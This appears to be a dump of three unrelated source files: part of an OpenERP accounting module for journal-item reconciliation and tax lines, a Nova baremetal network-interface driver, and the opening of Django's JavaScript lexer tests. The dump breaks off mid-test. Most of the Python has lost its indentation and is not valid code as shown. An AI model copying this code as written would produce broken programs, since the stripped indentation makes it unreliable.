debit = debit > 0 and amount_residual_currency or 0.0
credit = credit > 0 and amount_residual_currency or 0.0
amount_currency_str = rml_parser.formatLang(amount_residual, currency_obj=company_currency)
total_amount_currency_str = rml_parser.formatLang(total_amount, currency_obj=company_currency)
amount_str = rml_parser.formatLang(debit or credit, currency_obj=target_currency)
total_amount_str = rml_parser.formatLang(total_amount_currency, currency_obj=target_currency)
else:
debit = debit > 0 and amount_residual or 0.0
credit = credit > 0 and amount_residual or 0.0
amount_str = rml_parser.formatLang(debit or credit, currency_obj=company_currency)
total_amount_str = rml_parser.formatLang(total_amount, currency_obj=company_currency)
if target_currency and target_currency != company_currency:
amount_currency_str = rml_parser.formatLang(debit or credit, currency_obj=line_currency)
total_amount_currency_str = rml_parser.formatLang(total_amount, currency_obj=line_currency)
ctx = context.copy()
if target_date:
ctx.update({'date': target_date})
debit = currency_obj.compute(cr, uid, company_currency.id, target_currency.id, debit, context=ctx)
credit = currency_obj.compute(cr, uid, company_currency.id, target_currency.id, credit, context=ctx)
amount_str = rml_parser.formatLang(debit or credit, currency_obj=target_currency)
total_amount = currency_obj.compute(cr, uid, company_currency.id, target_currency.id, total_amount, context=ctx)
total_amount_str = rml_parser.formatLang(total_amount, currency_obj=target_currency)
ret_line['credit'] = credit
ret_line['debit'] = debit
ret_line['amount_str'] = amount_str
ret_line['amount_currency_str'] = amount_currency_str
ret_line['total_amount_str'] = total_amount_str # For partial reconciliations
ret_line['total_amount_currency_str'] = total_amount_currency_str
ret.append(ret_line)
return ret
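    # Minimal usage sketch (hypothetical ids, shown for illustration only):
    #
    #   aml_obj = self.pool.get('account.move.line')
    #   lines = aml_obj.browse(cr, uid, [7, 8], context=context)
    #   rows = aml_obj.prepare_move_lines_for_reconciliation_widget(
    #       cr, uid, lines, target_currency=False, context=context)
    #   # each dict in rows carries 'debit', 'credit', 'amount_str', ... for the widget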
def list_partners_to_reconcile(self, cr, uid, context=None):
cr.execute(
"""SELECT partner_id FROM (
SELECT l.partner_id, p.last_reconciliation_date, SUM(l.debit) AS debit, SUM(l.credit) AS credit, MAX(l.create_date) AS max_date
FROM account_move_line l
RIGHT JOIN account_account a ON (a.id = l.account_id)
RIGHT JOIN res_partner p ON (l.partner_id = p.id)
WHERE a.reconcile IS TRUE
AND l.reconcile_id IS NULL
AND l.state <> 'draft'
GROUP BY l.partner_id, p.last_reconciliation_date
) AS s
WHERE debit > 0 AND credit > 0 AND (last_reconciliation_date IS NULL OR max_date > last_reconciliation_date)
ORDER BY last_reconciliation_date""")
ids = [x[0] for x in cr.fetchall()]
if not ids:
return []
# To apply the ir_rules
partner_obj = self.pool.get('res.partner')
ids = partner_obj.search(cr, uid, [('id', 'in', ids)], context=context)
return partner_obj.name_get(cr, uid, ids, context=context)
def reconcile_partial(self, cr, uid, ids, type='auto', context=None, writeoff_acc_id=False, writeoff_period_id=False, writeoff_journal_id=False):
move_rec_obj = self.pool.get('account.move.reconcile')
merges = []
unmerge = []
total = 0.0
merges_rec = []
company_list = []
if context is None:
context = {}
for line in self.browse(cr, uid, ids, context=context):
            if company_list and line.company_id.id not in company_list:
raise osv.except_osv(_('Warning!'), _('To reconcile the entries company should be the same for all entries.'))
company_list.append(line.company_id.id)
for line in self.browse(cr, uid, ids, context=context):
if line.account_id.currency_id:
currency_id = line.account_id.currency_id
else:
currency_id = line.company_id.currency_id
if line.reconcile_id:
raise osv.except_osv(_('Warning'), _("Journal Item '%s' (id: %s), Move '%s' is already reconciled!") % (line.name, line.id, line.move_id.name))
if line.reconcile_partial_id:
for line2 in line.reconcile_partial_id.line_partial_ids:
if line2.state != 'valid':
raise osv.except_osv(_('Warning'), _("Journal Item '%s' (id: %s) cannot be used in a reconciliation as it is not balanced!") % (line2.name, line2.id))
if not line2.reconcile_id:
if line2.id not in merges:
merges.append(line2.id)
if line2.account_id.currency_id:
total += line2.amount_currency
else:
total += (line2.debit or 0.0) - (line2.credit or 0.0)
merges_rec.append(line.reconcile_partial_id.id)
else:
unmerge.append(line.id)
if line.account_id.currency_id:
total += line.amount_currency
else:
total += (line.debit or 0.0) - (line.credit or 0.0)
if self.pool.get('res.currency').is_zero(cr, uid, currency_id, total):
res = self.reconcile(cr, uid, merges+unmerge, context=context, writeoff_acc_id=writeoff_acc_id, writeoff_period_id=writeoff_period_id, writeoff_journal_id=writeoff_journal_id)
return res
# marking the lines as reconciled does not change their validity, so there is no need
# to revalidate their moves completely.
reconcile_context = dict(context, novalidate=True)
r_id = move_rec_obj.create(cr, uid, {
'type': type,
'line_partial_ids': map(lambda x: (4,x,False), merges+unmerge)
}, context=reconcile_context)
move_rec_obj.reconcile_partial_check(cr, uid, [r_id] + merges_rec, context=reconcile_context)
return r_id
def reconcile(self, cr, uid, ids, type='auto', writeoff_acc_id=False, writeoff_period_id=False, writeoff_journal_id=False, context=None):
account_obj = self.pool.get('account.account')
move_obj = self.pool.get('account.move')
move_rec_obj = self.pool.get('account.move.reconcile')
partner_obj = self.pool.get('res.partner')
currency_obj = self.pool.get('res.currency')
lines = self.browse(cr, uid, ids, context=context)
unrec_lines = filter(lambda x: not x['reconcile_id'], lines)
credit = debit = 0.0
currency = 0.0
account_id = False
partner_id = False
if context is None:
context = {}
company_list = []
for line in self.browse(cr, uid, ids, context=context):
            if company_list and line.company_id.id not in company_list:
raise osv.except_osv(_('Warning!'), _('To reconcile the entries company should be the same for all entries.'))
company_list.append(line.company_id.id)
for line in unrec_lines:
            if line.state != 'valid':
raise osv.except_osv(_('Error!'),
_('Entry "%s" is not valid !') % line.name)
credit += line['credit']
debit += line['debit']
currency += line['amount_currency'] or 0.0
account_id = line['account_id']['id']
partner_id = (line['partner_id'] and line['partner_id']['id']) or False
writeoff = debit - credit
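        # writeoff > 0 means the selected lines carry more debit than credit:
        # the balancing entry below credits this account and debits the
        # write-off account with the difference (and vice versa when negative).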
        # If date_p is set in the context => take this date
        if context.get('date_p'):
            date = context['date_p']
else:
date = time.strftime('%Y-%m-%d')
cr.execute('SELECT account_id, reconcile_id '\
'FROM account_move_line '\
'WHERE id IN %s '\
'GROUP BY account_id,reconcile_id',
(tuple(ids), ))
r = cr.fetchall()
#TODO: move this check to a constraint in the account_move_reconcile object
if len(r) != 1:
raise osv.except_osv(_('Error'), _('Entries are not of the same account or already reconciled ! '))
if not unrec_lines:
raise osv.except_osv(_('Error!'), _('Entry is already reconciled.'))
account = account_obj.browse(cr, uid, account_id, context=context)
if not account.reconcile:
raise osv.except_osv(_('Error'), _('The account is not defined to be reconciled !'))
if r[0][1] != None:
raise osv.except_osv(_('Error!'), _('Some entries are already reconciled.'))
if (not currency_obj.is_zero(cr, uid, account.company_id.currency_id, writeoff)) or \
(account.currency_id and (not currency_obj.is_zero(cr, uid, account.currency_id, currency))):
if not writeoff_acc_id:
raise osv.except_osv(_('Warning!'), _('You have to provide an account for the write off/exchange difference entry.'))
if writeoff > 0:
debit = writeoff
credit = 0.0
self_credit = writeoff
self_debit = 0.0
else:
debit = 0.0
credit = -writeoff
self_credit = 0.0
self_debit = -writeoff
        # If a comment exists in the context, take it
        if context.get('comment'):
libelle = context['comment']
else:
libelle = _('Write-Off')
cur_obj = self.pool.get('res.currency')
cur_id = False
amount_currency_writeoff = 0.0
if context.get('company_currency_id',False) != context.get('currency_id',False):
cur_id = context.get('currency_id',False)
for line in unrec_lines:
if line.currency_id and line.currency_id.id == context.get('currency_id',False):
amount_currency_writeoff += line.amount_currency
else:
tmp_amount = cur_obj.compute(cr, uid, line.account_id.company_id.currency_id.id, context.get('currency_id',False), abs(line.debit-line.credit), context={'date': line.date})
amount_currency_writeoff += (line.debit > 0) and tmp_amount or -tmp_amount
writeoff_lines = [
(0, 0, {
'name': libelle,
'debit': self_debit,
'credit': self_credit,
'account_id': account_id,
'date': date,
'partner_id': partner_id,
'currency_id': cur_id or (account.currency_id.id or False),
'amount_currency': amount_currency_writeoff and -1 * amount_currency_writeoff or (account.currency_id.id and -1 * currency or 0.0)
}),
(0, 0, {
'name': libelle,
'debit': debit,
'credit': credit,
'account_id': writeoff_acc_id,
'analytic_account_id': context.get('analytic_id', False),
'date': date,
'partner_id': partner_id,
'currency_id': cur_id or (account.currency_id.id or False),
'amount_currency': amount_currency_writeoff and amount_currency_writeoff or (account.currency_id.id and currency or 0.0)
})
]
writeoff_move_id = move_obj.create(cr, uid, {
'period_id': writeoff_period_id,
'journal_id': writeoff_journal_id,
'date':date,
'state': 'draft',
'line_id': writeoff_lines
})
writeoff_line_ids = self.search(cr, uid, [('move_id', '=', writeoff_move_id), ('account_id', '=', account_id)])
if account_id == writeoff_acc_id:
writeoff_line_ids = [writeoff_line_ids[1]]
ids += writeoff_line_ids
# marking the lines as reconciled does not change their validity, so there is no need
# to revalidate their moves completely.
reconcile_context = dict(context, novalidate=True)
r_id = move_rec_obj.create(cr, uid, {
'type': type,
'line_id': map(lambda x: (4, x, False), ids),
'line_partial_ids': map(lambda x: (3, x, False), ids)
}, context=reconcile_context)
# the id of the move.reconcile is written in the move.line (self) by the create method above
# because of the way the line_id are defined: (4, x, False)
for id in ids:
workflow.trg_trigger(uid, 'account.move.line', id, cr)
if lines and lines[0]:
partner_id = lines[0].partner_id and lines[0].partner_id.id or False
if partner_id and not partner_obj.has_something_to_reconcile(cr, uid, partner_id, context=context):
partner_obj.mark_as_reconciled(cr, uid, [partner_id], context=context)
return r_id
def view_header_get(self, cr, user, view_id, view_type, context=None):
if context is None:
context = {}
context = self.convert_to_period(cr, user, context=context)
if context.get('account_id', False):
cr.execute('SELECT code FROM account_account WHERE id = %s', (context['account_id'], ))
res = cr.fetchone()
if res:
res = _('Entries: ')+ (res[0] or '')
return res
if (not context.get('journal_id', False)) or (not context.get('period_id', False)):
return False
if context.get('search_default_journal_id', False):
context['journal_id'] = context.get('search_default_journal_id')
cr.execute('SELECT code FROM account_journal WHERE id = %s', (context['journal_id'], ))
j = cr.fetchone()[0] or ''
cr.execute('SELECT code FROM account_period WHERE id = %s', (context['period_id'], ))
p = cr.fetchone()[0] or ''
if j or p:
return j + (p and (':' + p) or '')
return False
def onchange_date(self, cr, user, ids, date, context=None):
"""
Returns a dict that contains new values and context
@param cr: A database cursor
@param user: ID of the user currently logged in
@param date: latest value from user input for field date
@param context: context arguments, like lang, time zone
@return: Returns a dict which contains new values, and context
"""
res = {}
if context is None:
context = {}
period_pool = self.pool.get('account.period')
pids = period_pool.find(cr, user, date, context=context)
if pids:
res.update({'period_id':pids[0]})
context = dict(context, period_id=pids[0])
return {
'value':res,
'context':context,
}
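    # e.g. onchange_date(cr, uid, [], '2014-03-15') looks up the period that
    # contains that date and proposes it both in 'value' and in the context.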
def _check_moves(self, cr, uid, context=None):
# use the first move ever created for this journal and period
if context is None:
context = {}
cr.execute('SELECT id, state, name FROM account_move WHERE journal_id = %s AND period_id = %s ORDER BY id limit 1', (context['journal_id'],context['period_id']))
res = cr.fetchone()
if res:
if res[1] != 'draft':
raise osv.except_osv(_('User Error!'),
_('The account move (%s) for centralisation ' \
'has been confirmed.') % res[2])
return res
def _remove_move_reconcile(self, cr, uid, move_ids=None, opening_reconciliation=False, context=None):
        # Remove the move reconcile ids related to the given moves
obj_move_line = self.pool.get('account.move.line')
obj_move_rec = self.pool.get('account.move.reconcile')
unlink_ids = []
if not move_ids:
return True
recs = obj_move_line.read(cr, uid, move_ids, ['reconcile_id', 'reconcile_partial_id'])
full_recs = filter(lambda x: x['reconcile_id'], recs)
rec_ids = [rec['reconcile_id'][0] for rec in full_recs]
part_recs = filter(lambda x: x['reconcile_partial_id'], recs)
part_rec_ids = [rec['reconcile_partial_id'][0] for rec in part_recs]
unlink_ids += rec_ids
unlink_ids += part_rec_ids
all_moves = obj_move_line.search(cr, uid, ['|',('reconcile_id', 'in', unlink_ids),('reconcile_partial_id', 'in', unlink_ids)])
all_moves = list(set(all_moves) - set(move_ids))
if unlink_ids:
if opening_reconciliation:
raise osv.except_osv(_('Warning!'),
_('Opening Entries have already been generated. Please run "Cancel Closing Entries" wizard to cancel those entries and then run this wizard.'))
obj_move_rec.write(cr, uid, unlink_ids, {'opening_reconciliation': False})
obj_move_rec.unlink(cr, uid, unlink_ids)
if len(all_moves) >= 2:
obj_move_line.reconcile_partial(cr, uid, all_moves, 'auto',context=context)
return True
def unlink(self, cr, uid, ids, context=None, check=True):
if context is None:
context = {}
move_obj = self.pool.get('account.move')
self._update_check(cr, uid, ids, context)
result = False
move_ids = set()
for line in self.browse(cr, uid, ids, context=context):
move_ids.add(line.move_id.id)
context['journal_id'] = line.journal_id.id
context['period_id'] = line.period_id.id
result = super(account_move_line, self).unlink(cr, uid, [line.id], context=context)
move_ids = list(move_ids)
if check and move_ids:
move_obj.validate(cr, uid, move_ids, context=context)
return result
def write(self, cr, uid, ids, vals, context=None, check=True, update_check=True):
if context is None:
context={}
move_obj = self.pool.get('account.move')
account_obj = self.pool.get('account.account')
journal_obj = self.pool.get('account.journal')
if isinstance(ids, (int, long)):
ids = [ids]
if vals.get('account_tax_id', False):
raise osv.except_osv(_('Unable to change tax!'), _('You cannot change the tax, you should remove and recreate lines.'))
if ('account_id' in vals) and not account_obj.read(cr, uid, vals['account_id'], ['active'])['active']:
raise osv.except_osv(_('Bad Account!'), _('You cannot use an inactive account.'))
if update_check:
if ('account_id' in vals) or ('journal_id' in vals) or ('period_id' in vals) or ('move_id' in vals) or ('debit' in vals) or ('credit' in vals) or ('date' in vals):
self._update_check(cr, uid, ids, context)
todo_date = None
if vals.get('date', False):
todo_date = vals['date']
del vals['date']
for line in self.browse(cr, uid, ids, context=context):
ctx = context.copy()
if not ctx.get('journal_id'):
if line.move_id:
ctx['journal_id'] = line.move_id.journal_id.id
else:
ctx['journal_id'] = line.journal_id.id
if not ctx.get('period_id'):
if line.move_id:
ctx['period_id'] = line.move_id.period_id.id
else:
ctx['period_id'] = line.period_id.id
#Check for centralisation
journal = journal_obj.browse(cr, uid, ctx['journal_id'], context=ctx)
if journal.centralisation:
self._check_moves(cr, uid, context=ctx)
result = super(account_move_line, self).write(cr, uid, ids, vals, context)
if check:
done = []
for line in self.browse(cr, uid, ids):
if line.move_id.id not in done:
done.append(line.move_id.id)
move_obj.validate(cr, uid, [line.move_id.id], context)
if todo_date:
move_obj.write(cr, uid, [line.move_id.id], {'date': todo_date}, context=context)
return result
def _update_journal_check(self, cr, uid, journal_id, period_id, context=None):
journal_obj = self.pool.get('account.journal')
period_obj = self.pool.get('account.period')
jour_period_obj = self.pool.get('account.journal.period')
cr.execute('SELECT state FROM account_journal_period WHERE journal_id = %s AND period_id = %s', (journal_id, period_id))
result = cr.fetchall()
journal = journal_obj.browse(cr, uid, journal_id, context=context)
period = period_obj.browse(cr, uid, period_id, context=context)
for (state,) in result:
if state == 'done':
                raise osv.except_osv(_('Error!'), _('You can not add/modify entries in a closed period %s of journal %s.') % (period.name, journal.name))
if not result:
jour_period_obj.create(cr, uid, {
'name': (journal.code or journal.name)+':'+(period.name or ''),
'journal_id': journal.id,
'period_id': period.id
})
return True
def _update_check(self, cr, uid, ids, context=None):
done = {}
for line in self.browse(cr, uid, ids, context=context):
err_msg = _('Move name (id): %s (%s)') % (line.move_id.name, str(line.move_id.id))
            if line.move_id.state != 'draft' and (not line.journal_id.entry_posted):
raise osv.except_osv(_('Error!'), _('You cannot do this modification on a confirmed entry. You can just change some non legal fields or you must unconfirm the journal entry first.\n%s.') % err_msg)
if line.reconcile_id:
raise osv.except_osv(_('Error!'), _('You cannot do this modification on a reconciled entry. You can just change some non legal fields or you must unreconcile first.\n%s.') % err_msg)
t = (line.journal_id.id, line.period_id.id)
if t not in done:
self._update_journal_check(cr, uid, line.journal_id.id, line.period_id.id, context)
done[t] = True
return True
def create(self, cr, uid, vals, context=None, check=True):
account_obj = self.pool.get('account.account')
tax_obj = self.pool.get('account.tax')
move_obj = self.pool.get('account.move')
cur_obj = self.pool.get('res.currency')
journal_obj = self.pool.get('account.journal')
context = dict(context or {})
if vals.get('move_id', False):
move = self.pool.get('account.move').browse(cr, uid, vals['move_id'], context=context)
if move.company_id:
vals['company_id'] = move.company_id.id
if move.date and not vals.get('date'):
vals['date'] = move.date
if ('account_id' in vals) and not account_obj.read(cr, uid, [vals['account_id']], ['active'])[0]['active']:
raise osv.except_osv(_('Bad Account!'), _('You cannot use an inactive account.'))
if 'journal_id' in vals and vals['journal_id']:
context['journal_id'] = vals['journal_id']
if 'period_id' in vals and vals['period_id']:
context['period_id'] = vals['period_id']
if ('journal_id' not in context) and ('move_id' in vals) and vals['move_id']:
m = move_obj.browse(cr, uid, vals['move_id'])
context['journal_id'] = m.journal_id.id
context['period_id'] = m.period_id.id
#we need to treat the case where a value is given in the context for period_id as a string
if 'period_id' in context and not isinstance(context.get('period_id', ''), (int, long)):
period_candidate_ids = self.pool.get('account.period').name_search(cr, uid, name=context.get('period_id',''))
if len(period_candidate_ids) != 1:
raise osv.except_osv(_('Error!'), _('No period found or more than one period found for the given date.'))
context['period_id'] = period_candidate_ids[0][0]
if not context.get('journal_id', False) and context.get('search_default_journal_id', False):
context['journal_id'] = context.get('search_default_journal_id')
self._update_journal_check(cr, uid, context['journal_id'], context['period_id'], context)
move_id = vals.get('move_id', False)
journal = journal_obj.browse(cr, uid, context['journal_id'], context=context)
vals['journal_id'] = vals.get('journal_id') or context.get('journal_id')
vals['period_id'] = vals.get('period_id') or context.get('period_id')
vals['date'] = vals.get('date') or context.get('date')
if not move_id:
if journal.centralisation:
#Check for centralisation
res = self._check_moves(cr, uid, context)
if res:
vals['move_id'] = res[0]
if not vals.get('move_id', False):
if journal.sequence_id:
#name = self.pool.get('ir.sequence').next_by_id(cr, uid, journal.sequence_id.id)
v = {
'date': vals.get('date', time.strftime('%Y-%m-%d')),
'period_id': context['period_id'],
'journal_id': context['journal_id']
}
if vals.get('ref', ''):
v.update({'ref': vals['ref']})
move_id = move_obj.create(cr, uid, v, context)
vals['move_id'] = move_id
else:
raise osv.except_osv(_('No Piece Number!'), _('Cannot create an automatic sequence for this piece.\nPut a sequence in the journal definition for automatic numbering or create a sequence manually for this piece.'))
ok = not (journal.type_control_ids or journal.account_control_ids)
if ('account_id' in vals):
account = account_obj.browse(cr, uid, vals['account_id'], context=context)
if journal.type_control_ids:
type = account.user_type
for t in journal.type_control_ids:
if type.code == t.code:
ok = True
break
if journal.account_control_ids and not ok:
for a in journal.account_control_ids:
if a.id == vals['account_id']:
ok = True
break
# Automatically convert in the account's secondary currency if there is one and
# the provided values were not already multi-currency
if account.currency_id and 'amount_currency' not in vals and account.currency_id.id != account.company_id.currency_id.id:
vals['currency_id'] = account.currency_id.id
ctx = {}
if 'date' in vals:
ctx['date'] = vals['date']
vals['amount_currency'] = cur_obj.compute(cr, uid, account.company_id.currency_id.id,
account.currency_id.id, vals.get('debit', 0.0)-vals.get('credit', 0.0), context=ctx)
if not ok:
raise osv.except_osv(_('Bad Account!'), _('You cannot use this general account in this journal, check the tab \'Entry Controls\' on the related journal.'))
result = super(account_move_line, self).create(cr, uid, vals, context=context)
# CREATE Taxes
if vals.get('account_tax_id', False):
tax_id = tax_obj.browse(cr, uid, vals['account_tax_id'])
total = vals['debit'] - vals['credit']
base_code = 'base_code_id'
tax_code = 'tax_code_id'
account_id = 'account_collected_id'
base_sign = 'base_sign'
tax_sign = 'tax_sign'
if journal.type in ('purchase_refund', 'sale_refund') or (journal.type in ('cash', 'bank') and total < 0):
base_code = 'ref_base_code_id'
tax_code = 'ref_tax_code_id'
account_id = 'account_paid_id'
base_sign = 'ref_base_sign'
tax_sign = 'ref_tax_sign'
tmp_cnt = 0
for tax in tax_obj.compute_all(cr, uid, [tax_id], total, 1.00, force_excluded=False).get('taxes'):
#create the base movement
if tmp_cnt == 0:
if tax[base_code]:
tmp_cnt += 1
if tax_id.price_include:
total = tax['price_unit']
newvals = {
'tax_code_id': tax[base_code],
'tax_amount': tax[base_sign] * abs(total),
}
if tax_id.price_include:
if tax['price_unit'] < 0:
newvals['credit'] = abs(tax['price_unit'])
else:
newvals['debit'] = tax['price_unit']
self.write(cr, uid, [result], newvals, context=context)
else:
data = {
'move_id': vals['move_id'],
'name': tools.ustr(vals['name'] or '') + ' ' + tools.ustr(tax['name'] or ''),
'date': vals['date'],
'partner_id': vals.get('partner_id', False),
'ref': vals.get('ref', False),
'statement_id': vals.get('statement_id', False),
'account_tax_id': False,
'tax_code_id': tax[base_code],
'tax_amount': tax[base_sign] * abs(total),
'account_id': vals['account_id'],
'credit': 0.0,
'debit': 0.0,
}
if data['tax_code_id']:
self.create(cr, uid, data, context)
#create the Tax movement
data = {
'move_id': vals['move_id'],
'name': tools.ustr(vals['name'] or '') + ' ' + tools.ustr(tax['name'] or ''),
'date': vals['date'],
'partner_id': vals.get('partner_id',False),
'ref': vals.get('ref',False),
'statement_id': vals.get('statement_id', False),
'account_tax_id': False,
'tax_code_id': tax[tax_code],
'tax_amount': tax[tax_sign] * abs(tax['amount']),
'account_id': tax[account_id] or vals['account_id'],
'credit': tax['amount']<0 and -tax['amount'] or 0.0,
'debit': tax['amount']>0 and tax['amount'] or 0.0,
}
if data['tax_code_id']:
self.create(cr, uid, data, context)
del vals['account_tax_id']
if check and not context.get('novalidate') and (context.get('recompute', True) or journal.entry_posted):
tmp = move_obj.validate(cr, uid, [vals['move_id']], context)
if journal.entry_posted and tmp:
move_obj.button_validate(cr,uid, [vals['move_id']], context)
return result
def list_periods(self, cr, uid, context=None):
ids = self.pool.get('account.period').search(cr,uid,[])
return self.pool.get('account.period').name_get(cr, uid, ids, context=context)
def list_journals(self, cr, uid, context=None):
ng = dict(self.pool.get('account.journal').name_search(cr,uid,'',[]))
ids = ng.keys()
result = []
for journal in self.pool.get('account.journal').browse(cr, uid, ids, context=context):
result.append((journal.id,ng[journal.id],journal.type,
bool(journal.currency),bool(journal.analytic_journal_id)))
return result
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
fajoy/nova | nova/virt/baremetal/vif_driver.py | 2 | 3058 | # Copyright (c) 2012 NTT DOCOMO, INC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import context
from nova import exception
from nova.openstack.common import cfg
from nova.openstack.common import log as logging
from nova.virt.baremetal import db as bmdb
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class BareMetalVIFDriver(object):
def _after_plug(self, instance, network, mapping, pif):
pass
def _after_unplug(self, instance, network, mapping, pif):
pass
def plug(self, instance, vif):
LOG.debug(_("plug: instance_uuid=%(uuid)s vif=%(vif)s")
% {'uuid': instance['uuid'], 'vif': vif})
network, mapping = vif
vif_uuid = mapping['vif_uuid']
ctx = context.get_admin_context()
node = bmdb.bm_node_get_by_instance_uuid(ctx, instance['uuid'])
# TODO(deva): optimize this database query
# this is just searching for a free physical interface
pifs = bmdb.bm_interface_get_all_by_bm_node_id(ctx, node['id'])
for pif in pifs:
if not pif['vif_uuid']:
bmdb.bm_interface_set_vif_uuid(ctx, pif['id'], vif_uuid)
LOG.debug(_("pif:%(id)s is plugged (vif_uuid=%(vif_uuid)s)")
% {'id': pif['id'], 'vif_uuid': vif_uuid})
self._after_plug(instance, network, mapping, pif)
return
# NOTE(deva): should this really be raising an exception
# when there are no physical interfaces left?
raise exception.NovaException(_(
"Baremetal node: %(id)s has no available physical interface"
" for virtual interface %(vif_uuid)s")
% {'id': node['id'], 'vif_uuid': vif_uuid})
def unplug(self, instance, vif):
LOG.debug(_("unplug: instance_uuid=%(uuid)s vif=%(vif)s"),
{'uuid': instance['uuid'], 'vif': vif})
network, mapping = vif
vif_uuid = mapping['vif_uuid']
ctx = context.get_admin_context()
try:
pif = bmdb.bm_interface_get_by_vif_uuid(ctx, vif_uuid)
bmdb.bm_interface_set_vif_uuid(ctx, pif['id'], None)
LOG.debug(_("pif:%(id)s is unplugged (vif_uuid=%(vif_uuid)s)")
% {'id': pif['id'], 'vif_uuid': vif_uuid})
self._after_unplug(instance, network, mapping, pif)
except exception.NovaException:
LOG.warn(_("no pif for vif_uuid=%s") % vif_uuid)
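# Illustrative usage sketch (not part of this module): the compute driver is
# expected to call plug()/unplug() once per (network, mapping) pair, roughly:
#
#   driver = BareMetalVIFDriver()
#   for vif in network_info:      # each vif is a (network, mapping) tuple
#       driver.plug(instance, vif)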
| apache-2.0 |
Batterfii/django | tests/utils_tests/test_jslex.py | 153 | 9837 | # -*- coding: utf-8 -*-
"""Tests for jslex."""
# originally from https://bitbucket.org/ned/jslex
from __future__ import unicode_literals
from django.test import SimpleTestCase
from django.utils.jslex import JsLexer, prepare_js_for_gettext
class JsTokensTest(SimpleTestCase):
LEX_CASES = [
# ids
("a ABC $ _ a123", ["id a", "id ABC", "id $", "id _", "id a123"]),
("\\u1234 abc\\u0020 \\u0065_\\u0067", ["id \\u1234", "id abc\\u0020", "id \\u0065_\\u0067"]),
# numbers
("123 1.234 0.123e-3 0 1E+40 1e1 .123", [
"dnum 123", "dnum 1.234", "dnum 0.123e-3", "dnum 0", "dnum 1E+40",
"dnum 1e1", "dnum .123",
]),
("0x1 0xabCD 0XABcd", ["hnum 0x1", "hnum 0xabCD", "hnum 0XABcd"]),
("010 0377 090", ["onum 010", "onum 0377", "dnum 0", "dnum 90"]),
("0xa123ghi", ["hnum 0xa123", "id ghi"]),
# keywords
("function Function FUNCTION", ["keyword function", "id Function", "id FUNCTION"]),
("const constructor in inherits", ["keyword const", "id constructor", "keyword in", "id inherits"]),
("true true_enough", ["reserved true", "id true_enough"]),
# strings
(''' 'hello' "hello" ''', ["string 'hello'", 'string "hello"']),
(r""" 'don\'t' "don\"t" '"' "'" '\'' "\"" """, [
r"""string 'don\'t'""", r'''string "don\"t"''', r"""string '"'""",
r'''string "'"''', r"""string '\''""", r'''string "\""'''
]),
(r'"ƃuıxǝ⅂ ʇdıɹɔsɐʌɐſ\""', [r'string "ƃuıxǝ⅂ ʇdıɹɔsɐʌɐſ\""']),
# comments
("a//b", ["id a", "linecomment //b"]),
("/****/a/=2//hello", ["comment /****/", "id a", "punct /=", "dnum 2", "linecomment //hello"]),
("/*\n * Header\n */\na=1;", ["comment /*\n * Header\n */", "id a", "punct =", "dnum 1", "punct ;"]),
# punctuation
("a+++b", ["id a", "punct ++", "punct +", "id b"]),
# regex
(r"a=/a*/,1", ["id a", "punct =", "regex /a*/", "punct ,", "dnum 1"]),
(r"a=/a*[^/]+/,1", ["id a", "punct =", "regex /a*[^/]+/", "punct ,", "dnum 1"]),
(r"a=/a*\[^/,1", ["id a", "punct =", r"regex /a*\[^/", "punct ,", "dnum 1"]),
(r"a=/\//,1", ["id a", "punct =", r"regex /\//", "punct ,", "dnum 1"]),
# next two are from http://www.mozilla.org/js/language/js20-2002-04/rationale/syntax.html#regular-expressions
("""for (var x = a in foo && "</x>" || mot ? z:/x:3;x<5;y</g/i) {xyz(x++);}""",
["keyword for", "punct (", "keyword var", "id x", "punct =", "id a", "keyword in",
"id foo", "punct &&", 'string "</x>"', "punct ||", "id mot", "punct ?", "id z",
"punct :", "regex /x:3;x<5;y</g", "punct /", "id i", "punct )", "punct {",
"id xyz", "punct (", "id x", "punct ++", "punct )", "punct ;", "punct }"]),
("""for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y</g/i) {xyz(x++);}""",
["keyword for", "punct (", "keyword var", "id x", "punct =", "id a", "keyword in",
"id foo", "punct &&", 'string "</x>"', "punct ||", "id mot", "punct ?", "id z",
"punct /", "id x", "punct :", "dnum 3", "punct ;", "id x", "punct <", "dnum 5",
"punct ;", "id y", "punct <", "regex /g/i", "punct )", "punct {",
"id xyz", "punct (", "id x", "punct ++", "punct )", "punct ;", "punct }"]),
# Various "illegal" regexes that are valid according to the std.
(r"""/????/, /++++/, /[----]/ """, ["regex /????/", "punct ,", "regex /++++/", "punct ,", "regex /[----]/"]),
# Stress cases from http://stackoverflow.com/questions/5533925/what-javascript-constructs-does-jslex-incorrectly-lex/5573409#5573409 # NOQA
(r"""/\[/""", [r"""regex /\[/"""]),
(r"""/[i]/""", [r"""regex /[i]/"""]),
(r"""/[\]]/""", [r"""regex /[\]]/"""]),
(r"""/a[\]]/""", [r"""regex /a[\]]/"""]),
(r"""/a[\]]b/""", [r"""regex /a[\]]b/"""]),
(r"""/[\]/]/gi""", [r"""regex /[\]/]/gi"""]),
(r"""/\[[^\]]+\]/gi""", [r"""regex /\[[^\]]+\]/gi"""]),
("""
rexl.re = {
NAME: /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/,
UNQUOTED_LITERAL: /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/,
QUOTED_LITERAL: /^'(?:[^']|'')*'/,
NUMERIC_LITERAL: /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/,
SYMBOL: /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/
};
""", # NOQA
["id rexl", "punct .", "id re", "punct =", "punct {",
"id NAME", "punct :", r"""regex /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/""", "punct ,",
"id UNQUOTED_LITERAL", "punct :", r"""regex /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/""",
"punct ,",
